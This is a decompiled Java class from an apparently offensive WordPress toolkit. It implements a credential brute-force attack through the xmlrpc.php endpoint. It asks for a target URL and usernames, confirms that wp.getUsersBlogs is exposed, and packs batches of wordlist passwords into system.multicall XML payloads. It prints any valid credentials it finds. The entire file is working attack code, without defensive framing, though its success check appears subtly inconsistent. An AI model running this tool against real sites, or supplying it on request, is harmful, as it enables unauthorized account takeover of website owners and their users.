package org.pwnpress.bruteforce;

import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Iterator;
import java.util.List;
import java.util.Scanner;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.concurrent.atomic.AtomicInteger;
import org.pwnpress.framework.WPFrameworkSettings;
import org.pwnpress.utils.HttpRequest;

/* loaded from: input_file:org/pwnpress/bruteforce/XmlRpcBruteforce.class */
public class XmlRpcBruteforce {
    private static final String XMLRPC_ENDPOINT = "/xmlrpc.php";
    private static final int BATCH_SIZE = 4;
    private static final String XMLRPC_PAYLOAD_TEMPLATE = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>system.multicall</methodName>\n  <params>\n    <param>\n      <value>\n        <array>\n          <data>\n            %s\n          </data>\n        </array>\n      </value>\n    </param>\n  </params>\n</methodCall>\n";
    private static final String METHOD_PAYLOAD_TEMPLATE = "    <value>\n      <struct>\n        <member>\n          <name>methodName</name>\n          <value>wp.getUsersBlogs</value>\n        </member>\n        <member>\n          <name>params</name>\n          <value>\n            <array>\n              <data>\n                <value>%s</value>\n                <value>%s</value>\n              </data>\n            </array>\n          </value>\n        </member>\n      </struct>\n    </value>\n";
    private static final AtomicBoolean stopBruteforce = new AtomicBoolean(false);
    private static final AtomicInteger requestCounter = new AtomicInteger(0);
    private static final AtomicInteger passwordCounter = new AtomicInteger(0);
    private static boolean debugMode = false;
    private static boolean verboseMode = true;

    public static void xmlrpcBrute() {
        Scanner scanner = new Scanner(System.in);
        System.out.print("Enter target website URL (e.g., https://example.com): ");
        String trim = scanner.nextLine().trim();
        System.out.print("Enter usernames (comma-separated): ");
        String trim2 = scanner.nextLine().trim();
        if (!isXmlRpcEnabled(trim)) {
            System.out.println("[-] XML-RPC is not enabled on this target. Aborting.");
            return;
        }
        System.out.println("[+] XML-RPC is enabled. Starting brute-force attack...");
        System.out.println("    Press [s] for status, [q] to quit brute force, [v] to toggle verbose output, [d] to toggle debug info.");
        List<String> loadPasswordList = loadPasswordList();
        if (loadPasswordList.isEmpty()) {
            System.out.println("[-] No passwords found in wordlist. Exiting.");
        } else {
            startUserInputListener();
            bruteForce(trim, trim2, loadPasswordList);
        }
    }

    private static boolean isXmlRpcEnabled(String str) {
        try {
            HttpURLConnection postRequest = HttpRequest.postRequest(str + "/xmlrpc.php", "<methodCall><methodName>system.listMethods</methodName></methodCall>");
            int responseCode = postRequest.getResponseCode();
            String readResponse = HttpRequest.readResponse(postRequest);
            if (responseCode == 200) {
                if (readResponse.contains("wp.getUsersBlogs")) {
                    return true;
                }
            }
            return false;
        } catch (IOException e) {
            System.err.println("Error checking XML-RPC: " + e.getMessage());
            return false;
        }
    }

    private static void bruteForce(String str, String str2, List<String> list) {
        for (String str3 : str2.split(",")) {
            String trim = str3.trim();
            if (!trim.isEmpty()) {
                System.out.println("[*] Testing username: " + trim);
                for (int i = 0; i < list.size(); i += BATCH_SIZE) {
                    if (stopBruteforce.get()) {
                        System.out.println("[*] Brute force stopped by user.");
                        return;
                    }
                    List<String> subList = list.subList(i, Math.min(i + BATCH_SIZE, list.size()));
                    if (attemptLogin(str, trim, subList)) {
                        for (String str4 : subList) {
                            if (attemptLogin(str, trim, Collections.singletonList(str4))) {
                                System.out.println("[!] Valid credentials found: " + trim + " : " + str4);
                                return;
                            }
                        }
                    } else {
                        System.out.println("[+] Trying passwords: " + subList);
                    }
                    requestCounter.incrementAndGet();
                    passwordCounter.addAndGet(subList.size());
                    try {
                        Thread.sleep(1000L);
                    } catch (InterruptedException e) {
                        Thread.currentThread().interrupt();
                    }
                }
            }
        }
        System.out.println("[-] No valid credentials found.");
    }

    private static boolean attemptLogin(String str, String str2, List<String> list) {
        try {
            HttpURLConnection postRequest = HttpRequest.postRequest(str + "/xmlrpc.php", craftPayload(str2, list));
            postRequest.getResponseCode();
            String readResponse = HttpRequest.readResponse(postRequest);
            if (debugMode) {
                System.out.println("[DEBUG] Response for " + str2 + ": " + readResponse);
            }
            if (readResponse.contains("Insufficient arguments passed to this XML-RPC method.") || readResponse.contains("<value>true</value>")) {
                for (String str3 : list) {
                    if (readResponse.contains("Insufficient arguments passed to this XML-RPC method.")) {
                        System.out.println("[!] Valid credentials found: " + str2 + " : " + str3);
                        return true;
                    }
                }
            }
            return false;
        } catch (IOException e) {
            System.err.println("Error connecting to " + str + ": " + e.getMessage());
            return false;
        }
    }

    private static String craftPayload(String str, List<String> list) {
        StringBuilder sb = new StringBuilder();
        Iterator<String> it = list.iterator();
        while (it.hasNext()) {
            sb.append(String.format(METHOD_PAYLOAD_TEMPLATE, str, it.next()));
        }
        return String.format(XMLRPC_PAYLOAD_TEMPLATE, sb.toString());
    }

    private static List<String> loadPasswordList() {
        ArrayList arrayList = new ArrayList();
        String xmlrpcBruteforcePasswordsWordlist = WPFrameworkSettings.getXmlrpcBruteforcePasswordsWordlist();
        if (xmlrpcBruteforcePasswordsWordlist == null || xmlrpcBruteforcePasswordsWordlist.isEmpty()) {
            System.err.println("[-] Error: Password wordlist file is not set.");
            return arrayList;
        }
        try {
            BufferedReader bufferedReader = new BufferedReader(new FileReader(xmlrpcBruteforcePasswordsWordlist));
            while (true) {
                try {
                    String readLine = bufferedReader.readLine();
                    if (readLine == null) {
                        break;
                    }
                    arrayList.add(readLine.trim());
                } finally {
                }
            }
            bufferedReader.close();
        } catch (IOException e) {
            System.err.println("[-] Error reading password wordlist: " + e.getMessage());
        }
        return arrayList;
    }

    private static void startUserInputListener() {
        Thread thread = new Thread(() -> {
            Scanner scanner = new Scanner(System.in);
            while (!stopBruteforce.get()) {
                String lowerCase = scanner.nextLine().trim().toLowerCase();
                if (lowerCase.equals("s")) {
                    System.out.println("[STATUS] Requests Sent: " + requestCounter.get() + " | Passwords Tested: " + passwordCounter.get());
                } else if (lowerCase.equals("q")) {
                    stopBruteforce.set(true);
                    System.out.println("[*] Stopping brute-force attack...");
                    return;
                } else if (lowerCase.equals("v")) {
                    verboseMode = !verboseMode;
                    System.out.println("[*] Verbose mode: " + (verboseMode ? "Enabled" : "Disabled"));
                } else if (lowerCase.equals("d")) {
                    debugMode = !debugMode;
                    System.out.println("[*] Debug mode: " + (debugMode ? "Enabled" : "Disabled"));
                }
            }
        });
        thread.setDaemon(true);
        thread.start();
    }
}
